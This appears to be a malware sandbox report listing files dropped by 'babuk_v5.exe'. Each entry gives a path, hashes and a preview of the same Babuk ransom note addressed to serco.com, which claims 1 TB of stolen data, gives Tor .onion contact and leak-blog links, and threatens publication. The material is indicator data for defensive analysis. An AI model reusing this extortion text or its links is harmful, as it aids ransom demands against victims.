                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-HK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ID\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-IE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-IN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-JM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-MY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-NZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-SG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-TT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ZA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\en-ZW\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-419\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-AR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-BO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\es-CR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
